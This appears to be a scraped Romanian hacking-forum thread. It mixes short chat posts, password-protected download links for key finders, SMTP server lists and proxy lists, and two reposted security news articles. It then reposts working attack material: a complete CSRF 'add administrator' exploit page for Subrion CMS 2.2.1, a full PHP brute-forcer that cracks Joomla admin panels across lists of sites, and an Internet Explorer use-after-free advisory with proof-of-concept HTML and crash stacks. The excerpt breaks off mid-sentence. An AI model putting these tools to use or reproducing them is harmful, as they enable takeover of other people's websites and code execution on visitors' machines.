bc-vnt

Me 2 , in " What's new ? "

Deci nu sunt singuru' si mie de astazi de dimineata imi apare aceeasi problema dar la 2-3 topic-uri . Daca imi mai apare o sa fac si eu un print . EDIT :

reUP please

Acer Notebook Aspire 5750G-2354G64 Processore Core i3 2,30 GHz, bit 64, Ram 4 GB: Amazon.it: Elettronica

Download : Win Key Finder.exe download - 2shared Scann : Description : Find your key Windows Sorry pentru titlu mi s-a blocat " R " Daca vrea vreun admin sa-l modifice

Enjoy : Whitepapers - www.technicalinfo.net

Enjoy ! - Basic MySQL Tutorial

Dj " si initialele Dj-ilor

Download : SMTP servers.rar download - 2shared pass RC4 : FdlDLiydKb pass ATOM128 : LlcaLIBaKWCC

Download no pass : Proxy's list.rar download - 2shared Si aici niste proxy speciale : Dangerous IP ranges!!!.rar download - 2shared pass SHA1 hash : a32e3b3b6857d671fefefc7cfb8349d22a7fc695 pass XOR : 0fa016ef920258052f0fae pass BASE64 : MmHfMsZfLQ// Inca o listuta : http://www.2shared.com/document/vbadhlEX/Proxy_list.html

Inchiderea inregistrarilor nu este o idee asa de buna , dar ideea unei " zone " pentru nou veniti e ok ! O idee ar fii aceaa ca dupa un anumit numar de posturi sa poata trece mai departe pe forum , DOAR O IDEE .

FIle not found , reUP

AV-Comparatives a mai mult de 18.000 de aplica?ii periculoase de Android plaseaz? Bitdefender Mobile Security în categoria produselor de top, atât la protec?ia împotriva viru?ilor de Android, cât ?i din punct de vedere al impactului pe care îl are asupra bateriei telefonului, potrivit testelor realizate de organiza?ia independent? de analiz? AV-Comparatives. Testarea realizat? de AV-Comparatives pe 13 produse software de securitate pentru Android a relevat c? Bitdefender Mobile Security se claseaz? în categoria produselor de top în ceea ce prive?te protec?ia împotriva viru?ilor. BMS a identificat între 98 ?i 100% din viru?ii de Android, din mai mult de 18.000 de aplica?ii periculoase. Bitdefender Mobile Security s-a dovedit a fi o solu?ie de top ?i în ceea ce prive?te detec?ia unui num?r mare de familii de adware. Aceasta este o calitate important? pentru un soft antivirus, întrucât anumite aplica?ii ce integreaz? con?inut publicitar deranjeaz? utilizatorii cu mesaje, f?r? ca ace?tia s? î?i poat? da seama care dintre aplica?iile folosite este responsabil? pentru respectivul con?inut. De asemenea, în timpul test?rii softul nu emis nicio alarm? fals?. În cadrul evalu?rii AV-Comparatives, speciali?tii organiza?iei independente au men?ionat printre calit??i interfa?a web foarte intuitiv? care permite controlul multiplelor dispozitive, gama larg? de comenzi prin SMS ?i caracteristicile modulului Anti-Theft. ’’Bitdefender are o istorie lung? în domeniul produselor antivirus performante pentru computere ?i ne bucur?m s? vedem c? experien?a companiei a fost transferat? în domeniul mobilelor. Bitdefender d? dovad? de o consecven?? deosebit? pe gama de produse pe care o test?m’’, spune Andreas Clementi CEO al AV- Comparatives. http://www.securitateit.ro/2012/09/studiu-privind-aplicatii-securitate-mobile/

Companiile au nevoie de o evaluare corect? a securit??i sistemelor IT pentru a avea o activitate eficient?. Organiza?iile ar trebui s? apeleze la o solu?ie tot mai important? ?i necesar? în zilele noastre – auditul IT. Scopul acestuia este de a determina ce vulnerabilit??i are un sistem informatic, pentru a le putea elimina cu solu?iile potrivite. Auditurile tehnice pentru aplica?ii online pot include elemente precum securitatea aplica?iei, arhitectura aplica?iei, calitatea codului, dar ?i elemente ce ?in de atragerea clien?ilor pe o platform? online: viteza de înc?rcare, impactul asupra motoarelor de c?utare sau uzabilitatea. „Din p?cate, un audit IT are loc foarte rar în România, mai ales în sectorul aplica?iilor online. De asemenea, exist? numeroase cazuri în care un cump?r?tor al unui business online nu ?tie de fapt ce a achizi?ionat, deoarece neglijeaz? aspectul efectu?rii unui astfel de audit. De aceea, eu recomand ca un maxim de 5% din bugetul de dezvoltare al unei companii s? fie alocat contract?rii unei noi firme care s? furnizeze acest tip de serviciu. Doar în acest mod te po?i asigura c? serviciile livrate sunt de calitate ?i c? nu vei avea de pl?tit chiar mai mult în viitor, dup? ce se încheie perioada de garan?ie”, spune Alexandru L?pu?an, CEO & Founding Partner Zitec, unul dintre principalii produc?tori locali de aplica?ii online. Speciali?tii Zitec au elaborat un top cu cele mai r?spândite 10 vulnerabilit??i ?i gre?eli frecvente g?site în auditurile realizate în ultimele 12 luni: 1. Parole ?i alte date confiden?iale, stocate neprotejat. Anumite date confiden?iale din cadrul unei companii pot ajunge în situa?ia de a fi stocate f?r? nici un fel de protec?ie sau folosindu-se metode de protejare insuficiente. 2. Fi?iere publice. În unele situa?ii exist? fi?iere cu date importante ce pot fi accesate foarte u?or din internet, acestea fiind practic publice. Fie c? acest lucru se datoreaz? neglijen?ei sau unei sc?p?ri de securitate, aceste fi?iere pot con?ine date sensibile sau informa?ii utile ce pot fi obiectul unor atacuri informatice. 3. Versiuni de software dep??ite. În produc?ie sunt folosite versiuni de software dep??ite, cu probleme de securitate critice cunoscute ?i remediate în versiuni ulterioare. Problemele de securitate cunoscute pot fi exploatate foarte u?or chiar de persoane f?r? cuno?tinte tehnice avansate, existând chiar ?i aplica?ii specializate în exploatarea acestor bre?e de securitate. 4. Dezv?luirea unor detalii tehnice. Exist? anumite cazuri în care o aplica?ie dezv?luie detalii tehnice sensibile atunci când una din componentele ei nu func?ioneaz?, informa?ii confiden?iale fiind f?cute publice prin intermediul mesajelor de eroare afi?ate. 5. Lipsa valid?rii datelor pe partea de server. O alt? vulnerabilitate a unui sistem informatic, g?sit? cu regularitate de speciali?tii Zitec în audit-urile realizate, este aceea în care se descoper? c? validarea datelor introduse de un utilizator se face doar în interfa?a afi?at? de browser, nu ?i la nivel de server. Acest lucru expune aplica?ia pentru mai multe tipuri de atacuri. 6. Conectarea la baza de date se face cu un utilizator care are permisiuni mult peste necesit??ile aplica?iei. Odat? compromise datele de acces, atacatorul poate câ?tiga u?or acces la toate bazele de date, unde pot exista ?i informa?ii ce apar?in de alte aplica?ii ale companiei. 7. Datele confiden?iale nu se transmit folosind un protocol securizat. Uneori se securizeaz? doar câteva pagini (login, register, checkout etc.) ?i nu tot site-ul, ceea ce face furtul de sesiune/identitate la fel de u?or ca pe un site neprotejat printr-un certificat de securitate. 8. Servicii care pot fi vectori de atac. Serverul de produc?ie are pornite servicii neutilizate, care, la rândul lor, au deschise port-uri. Aceste servicii sunt posibili vectori de atac (mai ales c?, fiind neutilizate, de obicei nu sunt actualizate la cele mai recente versiuni). 9. Fi?ierele de configurare ale aplica?iei sunt stocate în directoare publice. Riscul ca datele de configurare, incluzând uneori parole de acces sau alte date sensibile, s? fie accesate de personal neautorizat cre?te foarte mult în acest caz. 10. Vulnerabilit??i în fa?a unor atacuri de tip Denial of Service. Un exemplu ar fi stabilirea unei limite de memorie per conexiune de 10% (uneori considerabil mai mult) în memoria disponibil? a serverului. Astfel, 10 utilizatori concuren?i pot consuma întreaga memorie a serverului. Faptul c? speciali?tii din spatele unei aplica?ii cunosc aceste probleme nu garanteaz? c? le vor lua mereu în seam? în cadrul solu?iilor produse de ei. De aceea, un audit de acest tip nu verific? neap?rat calitatea echipei de dezvoltatori, ci mai degrab? calitatea proceselor de dezvoltare folosite. De asemenea, acestea ajut? clientul (fie el ?i din cadrul aceleia?i companii) s? se asigure c? nu va fi el cel care va pl?ti în viitor pentru o eventual? lips? de calitate a produsului. „Spre exemplu, noi realiz?m intern audituri periodice, al?turi de instructaje ale dezvoltatorilor, deoarece este mult mai u?or s? g?se?ti probleme într-un sistem decât s?-l construie?ti s? fie 100% sigur”, a ad?ugat L?pu?an. http://www.securitateit.ro/2012/09/top-10-vulnerabilitati-computere/

Done !

Au minte , wtf mane de asta cei plecati in afara , cei onesti sunt marginalizati si bagati in aceeasi " oala " cu astfel de persoane .

Subrion CMS version 2.2.1 suffers from a cross site request forgery vulnerability. <!-- Title: Subrion CMS 2.2.1 CSRF Add Admin Exploit Vendor: Intelliants LLC Product web page: http://www.subrion.com Affected version: 2.2.1 Summary: Subrion is a free open source content management system. It's written in PHP 5 and utilizes MySQL database. Subrion CMS can be easily integrated into your current website or used as a stand alone platform. It's extremely flexible and scalable php system that stands for a content management framework. Desc: The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. - Usergroup 1 - Administrator - Usergroup 2 - Moderator - Usergroup 8 - Registered Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25a Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Vendor status: [05.09.2012] Vulnerability discovered. [06.09.2012] Contact with the vendor. [07.09.2012] Vendor responds asking more details. [07.09.2012] Sent detailed information to the vendor. [10.09.2012] Vendor creates patch. [11.09.2012] Vendor releases version 2.2.2 to address this issue. [11.09.2012] Coordinated public security advisory released. Advisory ID: ZSL-2012-5106 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5106.php 05.09.2012 --> <html> <head> <title>Subrion CMS 2.2.1 CSRF Add Admin Exploit</title> </head> <body><center><br /> <form method="post" action="http://localhost/subrion/admin/accounts/add/" onsubmit="forge()"> <input type="hidden" name="username" value="Commando" /> <input type="hidden" name="fullname" value="Arnold Schwarzenegger" /> <input type="hidden" name="email" value="lab@zeroscience.mk" /> <input type="hidden" name="_password" value="l33tP4ss!" /> <input type="hidden" name="_password2" value="l33tP4ss!" /> <input type="hidden" name="usergroup" value="1" /> <input type="hidden" name="avatar" value="" /> <input type="hidden" name="sponsored" value="0" /> <input type="hidden" name="plan_id" value="1" /> <input type="hidden" name="sponsored_end" value="" /> <input type="hidden" name="status" value="active" /> <input type="hidden" name="save" value="Add" /> <input type="hidden" name="goto" value="list" /> <input type="hidden" name="old_name" value="ZSL" /> <input type="hidden" name="id" value="" /> <input type="submit" id="exploit" value="Forge!" /> </form></center> <script type="text/javascript"> function forge(){document.getElementById("exploit").click();} </script> </body> </html> http://packetstormsecurity.org/files/116433/Subrion-CMS-2.2.1-Cross-Site-Request-Forgery.html

This is a php script that takes a list of sites and password possibilities and runs as a cracker against Joomla administrative panels. <?php set_time_limit(0); /* * Joomla Brute Forcer * Coded by miyachung * miyachung@hotmail.com * Janissaries.Org * Special Thanks burtay * Usage-> php Bruter.php SITELIST PASSWORDS * Example-> php Bruter.php SITES.txt PASSWORDS.txt */ class jom { public $sites; public $wordlist; private $user = "admin"; private $regex = "/([0-9a-f]{32})/si"; private $timeout = 7; private $cookie_file = "cookie.jani"; private $log_file = "cracks.txt"; private function save_File($content) { $fp = fopen($this->log_file,'ab'); fwrite($fp,$content); fclose($fp); if($fp) { return true; } else { return false; } } private function get_Hash($site) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); curl_setopt($curl,CURLOPT_COOKIEJAR,$this->cookie_file); curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout); $play = curl_exec($curl); curl_close($curl); if(preg_match('#value="com_login"#si',$play)) { preg_match($this->regex,$play,$hash); return $hash[1]; } else { echo "[-]Hash not found,passing site\n"; return false; } } private function tryPassword($site,$password,$hash) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE); curl_setopt($curl,CURLOPT_POST,TRUE); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,TRUE); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); curl_setopt($curl,CURLOPT_COOKIEFILE,$this->cookie_file); curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout); curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$this->user."&passwd=".$password."?=&option=com_login&task=login&".$hash."=1"); $play = curl_exec($curl); curl_close($curl); return $play; } public function bruter() { $sites = explode("\n",file_get_contents($this->sites)); foreach($sites as $site) { if(!preg_match('#http#si',$site)) $site = "http://".$site; $site = trim($site); echo "\n[+]$site\n"; $hash = $this->get_Hash($site); if(!$hash){continue;} echo "[+]$hash\n"; $wordlist = explode("\n",file_get_contents($this->wordlist)); foreach($wordlist as $password) { $try = $this->tryPassword($site,trim($password),$hash); if(preg_match("/com_config/si",$try)) { echo "\n\t[*]Password cracked-> ".$password."\n"; echo "\t[*]Saved to the log file\n"; $this->save_File("$site|$password\r\n"); break; } } } } } if(!$argv[1] || !$argv[2]) { echo "################################################\n"; echo "\t\tJoomla Brute Forcer\n"; echo "\t\tCoded By miyachung\n"; echo "\t\tJanissaries.Org\n"; echo "################################################\n"; echo "\n[-]Missing arguments\n"; exit; } elseif(!file_exists($argv[1]) OR !file_exists($argv[2])) { echo "################################################\n"; echo "\t\tJoomla Brute Forcer\n"; echo "\t\tCoded By miyachung\n"; echo "\t\tJanissaries.Org\n"; echo "################################################\n"; echo "\n[-]File not found\n"; exit; } else { echo "################################################\n"; echo "\t\tJoomla Brute Forcer\n"; echo "\t\tCoded By miyachung\n"; echo "\t\tJanissaries.Org\n"; echo "################################################\n"; $jom = new jom; $jom->sites = $argv[1]; $jom->wordlist = $argv[2]; $jom->bruter(); } ?> http://packetstormsecurity.org/files/115088/Joomla-Admin-Panel-Bruteforcer.html

The vulnerability described in this document can be exploited by a malicious Web page to execute arbitrary code with low integrity. Active scripting must be enabled, and the present exploitation techniques require that font downloading be set to "Enable" or "Prompt" and that the "mailto:" protocol be present. (These requirements are satisfied by default on Windows XP, Windows Vista, and Windows 7.) The user is presented with a message box which must be dismissed before code execution can occur. Internet Explorer Script Interjection Code Execution Derek Soeder ds.adv.pub@gmail.com Reported: January 26, 2012, to SecuriTeam Secure Disclosure http://www.beyondsecurity.com/ssd.html Published: August 16, 2012 (updated September 6, 2012) AFFECTED VENDOR --------------- Microsoft Corporation AFFECTED ENVIRONMENTS --------------------- Internet Explorer 7.0 on Windows XP and Windows Vista Internet Explorer 8.0 on Windows XP, Windows Vista, and Windows 7 Internet Explorer 9.0.0 through 9.0.8 (MS12-044) on Windows Vista and Windows 7 Other versions of Internet Explorer have not been tested. UNAFFECTED ENVIRONMENTS ----------------------- Internet Explorer with MS12-052 hotfix applied IMPACT ------ The vulnerability described in this document can be exploited by a malicious Web page to execute arbitrary code with low integrity. Active scripting must be enabled, and the present exploitation techniques require that font downloading be set to "Enable" or "Prompt" and that the "mailto:" protocol be present. (These requirements are satisfied by default on Windows XP, Windows Vista, and Windows 7.) The user is presented with a message box which must be dismissed before code execution can occur. VULNERABILITY DETAILS --------------------- Processing of events in Internet Explorer is typically driven by window messages originating both externally (for instance, due to user input or paint requests) and internally. As with all window messages, these messages are retrieved from the current thread's message queue by a message loop, which dispatches each message to a window procedure. The window procedure, in turn, invokes code to handle the associated event based on the type of window message. If the event handling code can be made to display a message box or dialog, or otherwise enter a message loop, then another window message relating to a separate, second event may be dispatched during this "stacked," second message loop, meaning the second event will be processed before the original event has been fully handled. Processing of the original event continues only after the second message loop has ended (i.e., when the displayed message box or dialog closes). If the second event handling code can cause the program's state to become inconsistent with the first event handling code's expectations--for instance, by destroying objects referenced in variables local to the first event handling code--then it should be possible to cause memory corruption which can be exploited to achieve arbitrary code execution. A variety of events can result in script running during the event handler code. Although it's simple for script to display a message box or dialog and thereby enter a message loop (e.g., using window.alert, window.prompt, or window.clipboardData.getData under default security settings), so far it does not appear that an interrupting, second event handler can then do anything to disrupt program state in a way that the first event handler will not accommodate. This is understandable, since script must be able to handle other script running at any time and having arbitrary effects on program state. Objects accessible to script should be properly reference-counted and garbage-collected, and any exception would constitute a separate vulnerability that could likely be exploited without use of the flaw described in this document. In some cases, it's also possible to make MSHTML.DLL enter a message loop while handling a page rendering event (as opposed to an event intended to run script). For one, MSHTML!CMarkup::ProcessURLAction* is used to check a variety of security settings during page downloading and rendering; this function calls URLMON!ProcessUrlAction*, which may display a dialog if the queried setting's action is set to "Prompt". Unfortunately, most of the security settings which default to prompting are now handled through the yellow security band or notification bar rather than a dialog. Other avenues for reaching a message loop may be discovered by backtracking from functions such as DispatchMessageW, MessageBoxW, and DialogBoxParamW. One function call of particular interest is a call to MessageBoxW found in MSHTML!CMailtoProtocol::DisplayMailClientNotFoundError. It was discovered that, if Internet Explorer attempts to download a very long (approximately 2,030-character) "mailto:" URL, then CMailtoProtocol::RunMailClient will fail and call CMailtoProtocol::DisplayMailClientNotFoundError to display a message box, thereby entering a message loop. (The message reads, "Could not perform this operation because the default mail client is not properly installed.") Furthermore, it was found that displaying this message box while downloading an embedded font (by specifying a long "mailto:" URL for the font's "src" property) will result in references to targetable objects remaining on the stack until the message box is closed. Thus, a Web page can exploit this vulnerability by declaring an embedded font with a long "mailto:" source URL and ensuring that an event which destroys and replaces targetable objects occurs while the message box is open. Although the particulars of the targetable objects are Internet Explorer version-dependent, exploitation should generally proceed as typical for an Internet Explorer use-after-free vulnerability. Events The most significant complexity of this vulnerability is understanding Internet Explorer's event handling. As mentioned above, event handling is based on the processing of window messages. Some window messages may arise from user input (such as keyboard and mouse messages), while others may be generated by the operating system (such as paint and resize messages), but most messages signaling events are generated interally by Internet Explorer. These messages use a message identifier value of 0x8002 and are generated when a "method call" is added to a queue maintained in Thread Local Storage (TLS), if the queue is empty. A method call is simply a function pointer and associated data representing a callback to be invoked by the event handling message loop (or any other message loop). Method calls are queued using MSHTML!_GWPostMethodCallEx and handled by MSHTML!GlobalWndOnMethodCall, which the MSHTML!GlobalWndProc window procedure calls in response to a message 0x8002. It is important to note that a message 0x8002 will only be posted if the method call queue is empty and if a message 0x8002 is not outstanding (being processed or waiting to be processed). Therefore, with possibly one minor exception, a second message 0x8002 cannot be pending while a first message 0x8002 is being processed, meaning a second method call-based event cannot be handled while a first method call-based event is being handled, even if the first enters a message loop. When exploiting the vulnerability, one event may be based on a method call, but the other must correspond to user input or some other type of message. Although designing a Web page to provoke a user input message without user interaction is not difficult, Internet Explorer 9 offers another possibility by introducing asynchronous events. If a Web page is viewed in IE9 standards mode, certain events (for example, body.onfocus) will instead be mediated by messages with an identifier value of 0x8003, which are generated via MSHTML!CEventMgr::QueueAsyncEvent -> MSHTML!CAsyncEventQueue::QueueEvent and processed when GlobalWndProc calls MSHTML!CAsyncEventQueue::DispatchAllEvents. If the asynchronous event handling code enters a message loop, a message 0x8002 could then be dispatched and cause any queued method calls to be processed. Example (Internet Explorer 7 and 8) A simple example of how to reproduce this vulnerability in Internet Explorer versions 7 and 8 follows. A Web page contains an empty style sheet link, a body with an "onmouseover" event handler, and a script element which creates a new script element and assigns it an "onreadystatechange" event handler. The body also has a style which specifies a large height value, so that the body area will occupy the full height as well as width of the browser window. The following HTML illustrates: <html> <head> <script> var s = document.createElement("script"); s.src = "slow.js"; s.onreadystatechange = function() { if (this.readyState == "loaded") { document.styleSheets[0].cssText = null; } }; var o = document.getElementsByTagName("script")[0]; o.parentNode.insertBefore(s, o); </script> <link rel="stylesheet" href=""></link> </head> <body style="height: 9999px;" onmouseover="document.styleSheets[0].href = 'MyFont.css';"> </body> </html> The response to the request for "slow.js" can return anything--or nothing--as long as it takes longer to complete than does the request for "MyFont.css". The goal is to have the new script element's "onreadystatechange" event handler run after the style sheet has loaded. "MyFont.css" consists of the following CSS: @font-face { font-family: "MyFont"; src: url(mailto:xxx<... approximately 2,020 characters removed ...>xxx); } When the Web page loads, the presence of the mouse cursor over the window causes MSHTML!CServer::WndProc to receive a mouse window message, which it passes to MSHTML!CDoc::OnWindowMessage -> MSHTML!CDoc::OnMouseMessage. Further up the call stack, the script of the body's "onmouseover" event handler runs, setting the empty style sheet link's "href" attribute to load "MyFont.css". When the CSS defining the "MyFont" embedded font is parsed, the long "mailto:" URL will ultimately result in CMailtoProtocol::DisplayMailClientNotFoundError displaying an error message box, pausing execution of that thread except to process window messages. Using the "onmouseover" event handler for this purpose ensures that the message box will appear during processing of a user input window message, rather than during processing of a method call (0x8002) window message, which leaves the method call avenue available for the second event. While the message box is showing, our attack server completes its intentionally delayed response to the request for "slow.js", causing the client to queue a method call which will run the new script element's "onreadystatechange" event handler. Because a method call (message 0x8002) is not currently being processed--the event being processed originated instead as a mouse window message--this means the thread responsible for downloading "slow.js" is free to post a message 0x8002 after it queues the method call. The window message will then be dispatched by the message loop that drives the error message box, causing the "onreadystatechange" event handler to run. In this example, the event handler tampers with the object representing the style sheet, which was still being interpreted at the time the message box was displayed. The tampering provokes a crash once the message box closes and interpretation of the style sheet is allowed to continue. Example (Internet Explorer 9) Now a simple example specific to Internet Explorer 9 is presented. A Web page contains a body with an "onfocus" event handler, a style sheet defining an embedded font and a class which uses it, a "div" element of the defined class, and a script element which creates a new script element and assigns it an "onreadystatechange" event handler. The document begins with a "DOCTYPE" declaration which ensures that the page will be rendered in IE9 standards mode. The following HTML illustrates: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <style> @font-face { font-family: "MyFont"; src: url(mailto:xxx<... approximately 2,020 characters removed ...>xxx); } .MyFontClass { font-family: "MyFont"; } </style> <script> var s = document.createElement("script"); s.src = "slow.js"; s.onreadystatechange = function() { if (this.readyState == "loaded") { var d = document.getElementById("MyDiv"); d.parentNode.removeChild(d); } }; document.appendChild(s); </script> </head> <body onfocus="document.getElementById('MyDiv').className = 'MyFontClass';"> <div id="MyDiv"></div> </body> </html> In IE9 standards mode, embedded fonts are not downloaded until they're needed to render the page, meaning that the embedded font's long "mailto:" URL is interpreted--and therefore the error message box is displayed--when the body's "onfocus" event fires. Because body.onfocus is handled in IE9 standards mode as an asynchronous event (message 0x8003), method calls (message 0x8002) remain free to be dispatched while the message box message loop is on the call stack. In this example, we expect "slow.js" to finish downloading after body.onfocus fires and causes the error message box to appear. The code in IE that manages the download will queue an "onreadystatechange" method call for the script, which will be dispatched by the message box message loop, allowing our Javascript to execute. Since IE9 accesses embedded fonts on demand, there will be references to various object on the stack below the message box message loop, so if our Javascript tampers with these objects, a crash will result once the message box is closed. Walkthrough To help provide a visual understanding of the vulnerability, a chronological walkthrough of the Internet Explorer 9 example crash is presented here. Following along in the example is recommended. The symbols shown correspond to Internet Explorer 9.0.3 on Windows 7 SP1 x86, with MSHTML.DLL version 9.0.8112.16437 loaded at 6D1C0000 and page heap enabled. When the example page is loading, a 0x54-byte CTreePos class instance is allocated on the heap: (This CTreePos instance will be freed and its memory reused later.) 77365ae0 ntdll!RtlAllocateHeap+0x0000023a 6d423fe1 MSHTML!CHtmRootParseCtx::BeginElement+0x00000035 6d51b14b MSHTML!CHtmTextParseCtx::BeginElement+0x000000a1 6d4245a0 MSHTML!CHtmParse::BeginElement+0x00000151 6d4269aa MSHTML!CHtmParse::ParseBeginTag+0x00000199 6d422422 MSHTML!CHtmParse::ParseToken+0x00000100 6d42292a MSHTML!CHtmPost::Exec+0x00000233 6d427a10 MSHTML!CHtmPost::Run+0x00000041 6d42793c MSHTML!PostManExecute+0x000001a3 6d4278a1 MSHTML!PostManResume+0x000000dd 6d427801 MSHTML!CHtmPost::OnDwnChanCallback+0x00000010 6d40b4d5 MSHTML!CDwnChan::OnMethodCall+0x0000001f 6d5a9d09 MSHTML!GlobalWndOnMethodCall+0x00000115 6d5c9368 MSHTML!GlobalWndProc+0x00000302 7748c4e7 USER32!InternalCallWinProc+0x00000023 7748c5e7 USER32!UserCallWinProcCheckWow+0x0000014b 7748cc19 USER32!DispatchMessageWorker+0x0000035e 7748cc70 USER32!DispatchMessageW+0x0000000f 6e8e1b44 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000722 6e901a16 IEFRAME!LCIETab_ThreadProc+0x00000317 759315b0 iertutil!CIsoScope::RegisterThread+0x000000ab 6e8efd5b IEFRAME!Detour_DefWindowProcA+0x0000006c 75c4ed6c kernel32!BaseThreadInitThunk+0x0000000e 773737f5 ntdll!__RtlUserThreadStart+0x00000070 773737c8 ntdll!_RtlUserThreadStart+0x0000001b Next, the page's Javascript executes, creating a new script element with a source of "slow.js". The idea is that the Web server will intentionally postpone serving this file for a second or two. This arranges for an "onreadystatechange" event to fire after the delay elapses. Once the page finishes loading (but before the delay has elapsed), the "body.onfocus" event fires. Because the document is in IE9 standards mode, "body.onfocus" will be queued as an asynchronous event, meaning it will be mediated by window message 0x8003. The "body.onfocus" event handler changes a "div" element's class to a class that uses an embedded font. This forces Internet Explorer to attempt to download the font, which fails due to the long "mailto:" URL. Crucially, the failure triggers a "mailto"-specific message box to be displayed; this enters a new, top message loop during the original, bottom message loop's handling of the 0x8003 window message associated with the "body.onfocus" event. The call stack, from top to bottom, now looks like this: 774a382a USER32!NtUserWaitMessage+0xc 774a3b27 USER32!DialogBox2+0x207 774ce0d5 USER32!InternalDialogBox+0xcb 774ce659 USER32!SoftModalMessageBox+0x68a 774ce78c USER32!MessageBoxWorker+0x2ca 774cea08 USER32!MessageBoxTimeoutW+0x7f 6ea15e86 USER32!MessageBoxExW+0x1b 774ceaa4 IEFRAME!Detour_MessageBoxExW+0x47 6db3ac94 USER32!MessageBoxW+0x45 6db3aaf1 MSHTML!CMailtoProtocol::DisplayMailClientNotFoundError+0x10b 6db3a2cc MSHTML!CMailtoProtocol::RunMailClient+0x12e 6db39def MSHTML!CMailtoProtocol::ParseAndBind+0x8b 76ab1c0b MSHTML!CMailtoProtocol::Start+0xcd 76a98fb3 URLMON!COInetProt::StartEx+0xf0 76a9a31f URLMON!CTransaction::StartEx+0x40b 76a8386c URLMON!CBinding::StartBinding+0x883 6d438507 URLMON!operator new+0x20 6d4383ed MSHTML!CTridentFilterHost::BindToMoniker+0xe4 6d4216f3 MSHTML!CDwnBindData::Bind+0x722 6d42153b MSHTML!NewDwnBindData+0x189 6d20c107 MSHTML!CDwnLoad::Init+0x25c 6d5c1f27 MSHTML!CBitsLoad::Init+0x52 6d421279 MSHTML!CDwnInfo::SetLoad+0x11e 6d451257 MSHTML!CDwnInfo::AddDwnCtx+0x67 6d42c695 MSHTML!CDoc::NewDwnCtx2+0x30a 6d953c33 MSHTML!CDoc::NewDwnCtx+0x5b 6d956222 MSHTML!CEmbeddedFontFace::EnsureStartDownload+0x120 6d955aee MSHTML!CFontFace::CFontFaceSrc::EnsureStartDownload+0x8a 6d682c20 MSHTML!CFontFace::AddToFamily+0x18c 6d52ceb2 MSHTML!CStyleSheetArray::BuildFontFaceRuleFamily+0x58 6d52cd28 MSHTML!ApplyClear+0x113 6d51bc41 MSHTML!ApplyFontFace+0x1d4 6d40e103 MSHTML!ApplyFormatInfoProperty+0x33bf 6d40e424 MSHTML!ApplyAttrArrayValues+0x2bd 6d5b5344 MSHTML!CStyleSheetArray::Apply+0x34a 6d47bad8 MSHTML!CMarkup::ApplyStyleSheets+0x6a 6d47b89e MSHTML!CElement::ApplyStyleSheets+0x4a2 6d4cddff MSHTML!CElement::ApplyDefaultFormat+0x8b 6d47b5a0 MSHTML!CBlockElement::ApplyDefaultFormat+0x379 6d47a5a3 MSHTML!CElement::ComputeFormatsVirtual+0x1a1e 6d47a4d6 MSHTML!CElement::ComputeFormats+0xe1 6d47bd39 MSHTML!CTreeNode::ComputeFormats+0xba 6d482d33 MSHTML!CTreeNode::ComputeFormatsHelper+0x40 6d360862 MSHTML!CTreeNode::GetFancyFormat+0x32 6d2d910f MSHTML!CElement::UpdateFormats+0x426 6d4ce10f MSHTML!CControlledFormatter::Init+0xcc 6d47fa14 MSHTML!CElement::OnPropertyChangeInternal+0x3fa 6d49b76b MSHTML!CElement::OnPropertyChange+0x1b 6d2da8db MSHTML!BASICPROPPARAMS::SetStringProperty+0x36a 6d0084d6 MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_className+0x61 6d0cc04d JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4 6d0cc968 JSCRIPT9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117 6d009a85 JSCRIPT9!Js::JavascriptOperators::SetProperty+0x8c 6d009a2c JSCRIPT9!Js::JavascriptOperators::OP_SetProperty+0x59 039507b8 JSCRIPT9!Js::JavascriptOperators::PatchPutValueNoLocalFastPath+0xbc 6d0084d6 0x39507b8 6d0083fb JSCRIPT9!Js::JavascriptFunction::CallFunction+0xc4 6d008332 JSCRIPT9!Js::JavascriptFunction::CallRootFunction+0xb6 6d0082be JSCRIPT9!ScriptSite::CallRootFunction+0x4f 6d0cf12c JSCRIPT9!ScriptSite::Execute+0x63 6d4f24d1 JSCRIPT9!ScriptEngine::Execute+0x11a 6d4f23fb MSHTML!CListenerDispatch::InvokeVar+0x12a 6d54ce40 MSHTML!CListenerDispatch::Invoke+0x40 6d44e624 MSHTML!CEventMgr::_InvokeListeners+0x187 6d54cf37 MSHTML!CEventMgr::_InvokeListenersOnWindow+0xcc 6d5db67d MSHTML!CEventMgr::Dispatch+0x3cc 6d53ba32 MSHTML!CEventMgr::DispatchFocusEvent+0x7d 6d5e6f74 MSHTML!COmWindowProxy::Fire_onfocus+0x84 6d5e6ff1 MSHTML!CAsyncEventQueue::DispatchAllEvents+0x7c 7748c4e7 MSHTML!GlobalWndProc+0x2ed 7748c5e7 USER32!InternalCallWinProc+0x23 7748cc19 USER32!UserCallWinProcCheckWow+0x14b 7748cc70 USER32!DispatchMessageWorker+0x35e 6e8e1b44 USER32!DispatchMessageW+0xf 6e901a16 IEFRAME!CTabWindow::_TabWindowThreadProc+0x722 759315b0 IEFRAME!LCIETab_ThreadProc+0x317 6e8efd5b IERTUTIL!CIsoScope::RegisterThread+0xab 75c4ed6c IEFRAME!Detour_DefWindowProcA+0x6c 773737f5 KERNEL32!BaseThreadInitThunk+0xe 773737c8 NTDLL!__RtlUserThreadStart+0x70 00000000 NTDLL!_RtlUserThreadStart+0x1b As long as the message box remains open, its message loop will dispatch new window message-mediated events, and control won't return to Internet Explorer's original message loop. It doesn't matter which message loop is dispatching messages, because the same window procedure is executed in either case. The only problem is that the code lower on the call stack was operating on various heap objects (such as the 